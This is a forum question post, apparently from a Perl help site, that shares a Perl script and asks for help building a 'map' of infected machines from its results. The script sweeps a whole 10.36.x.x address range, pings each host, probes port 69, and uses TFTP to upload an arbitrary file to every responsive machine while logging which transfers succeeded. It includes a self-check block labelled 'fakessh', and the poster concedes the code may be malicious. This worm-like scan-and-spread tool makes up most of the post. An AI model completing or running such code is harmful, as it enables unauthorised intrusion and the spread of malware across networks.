perlquestion swilting <p>I just write a short message that may be related to malicious code. this text is written without the creation of the map of infected machines</p> <code> #!/usr/bin/perl -w use strict; use warnings; use Net::TFTP; use Net::Ping; use Data::Dumper; use FileHandle; BEGIN { local $/; open (ME,$0); my $me = <ME>; close ME; unless ($me =~ m/#fakessh \@='\d+'$/) { my $length = length $me; open (ME, ">>$0"); print ME "#fakessh \@='$length'"; close ME; $me .= "#fakessh \@='$length'"; } $me =~ s/#fakessh \@='(\d+)'$//; die "File $0 has changed ?viral infection?\n" unless $1 == length $me; } my $filename = $ARGV[0]; my $lastlogping = $ARGV[1]; usage() unless $filename; usage() unless $lastlogping; my $RESEAU; my $IP; my $tftp; my $port = 69; my %state; my $state; my $ip; my $ping; my $alive; my $sock; my %alive; my $pingerping; my $pingersocktftp; my $transfertftp; my $i; my $scalarlocaltime; my @map; autoflush STDOUT 1; for ($RESEAU = 2; $RESEAU <= 210; $RESEAU=$RESEAU+1) { for ($IP = 2; $IP < 255; $IP = $IP+1) { if ("10.36.".$RESEAU.".".$IP) { $scalarlocaltime = scalar localtime; my $p = Net::Ping->new('udp'); print "\nPinging host 10.36.$RESEAU.$IP\n"; if ($p->ping("10.36.$RESEAU.$IP"),1) { ## If we didn't know it was up, spew that out now.. $pingerping = 1; $pingersocktftp = 0;$transfertftp = 0; print "10.36.$RESEAU.$IP\twas up at ", scalar localtime, "\n" unless $state{$scalarlocaltime}{$pingerping}{$pingersocktftp}{10.36.$RESEAU.$IP}; ## Update the number of times we've seen it up $state{$scalarlocaltime}{$pingerping}{$pingersocktftp}{$transfertftp}{10.36.$RESEAU.$IP}++; ## And let STDOUT know about it, too. ##print "alive $scalarlocaltime $pingerping $pingersocktftp 10.36.$RESEAU.$IP time"; } my$sock=IO::Socket::INET->new( PeerAddr=>"10.36.$RESEAU.$IP", PeerPort=>"$port", Proto=>"tcp", Timeout=>"5") or warn "Cannot connect port 69 to 10.36.$RESEAU.$IP\n"; if (defined $sock) { $pingersocktftp = 1; } ## Update the number of times we've seen it up $state{$scalarlocaltime}{$pingerping}{$pingersocktftp}{$transfertftp}{10.36.$RESEAU.$IP}++; ## And let STDOUT know about it, too. ##print " alive ($pingerping $pingersocktftp 10.36.$RESEAU.$IP",scalar localtime; $state{$scalarlocaltime}{$pingerping}{$pingersocktftp}{$transfertftp}{alive} = "10.36.$RESEAU.$IP"; ##make log map if (defined ($sock )){ $tftp = Net::TFTP->new("10.36.$RESEAU.$IP", BlockSize => 1024) or warn "cannot connect tftp serveur\n"; if (defined ($tftp)){ $transfertftp = 1; ## Update the number of times we've seen it up $state{$scalarlocaltime}{$pingerping}{$pingersocktftp}{$transfertftp}{10.36.$RESEAU.$IP}++; ## And let STDOUT know about it, too. print "$state $scalarlocaltime $pingerping $pingersocktftp 10.36.$RESEAU.$IP transfert start"; $tftp->binary; $tftp->put($filename,$filename); } } my $fh = FileHandle->new($lastlogping , "a"); if (defined($fh)){ print $fh " alive $scalarlocaltime $pingerping $pingersocktftp $transfertftp 10.36.$RESEAU.$IP\n"; undef $fh; } } } } @map = map { $_ => ${state{$_}{$_}{$_}{$_}{$_}}} %state; sub usage { ## HERE documents are your friend for this kind of thing: print <<"EO_USAGE"; This program scans a C-class subnet and lists all machines, before with a udp ping after with a simple nmap scan and last try to upload via a client tftp You can also use this program to sort the output. Usage: perl $0 <file_to_transfer> <log_file_ping_ip> EO_USAGE exit; } #fakessh @='3715' </code> <p>I tried to encode a kind of card machines with instruction</p> <code> @map = map { $_ => ${state{$_}{$_}{$_}{$_}{$_}}} %state; </code> <p>when do you think? how it would be easier and the right technique to encode both the card to look inside information </p><p></p> <p>it is the best technique you can give me an example</p>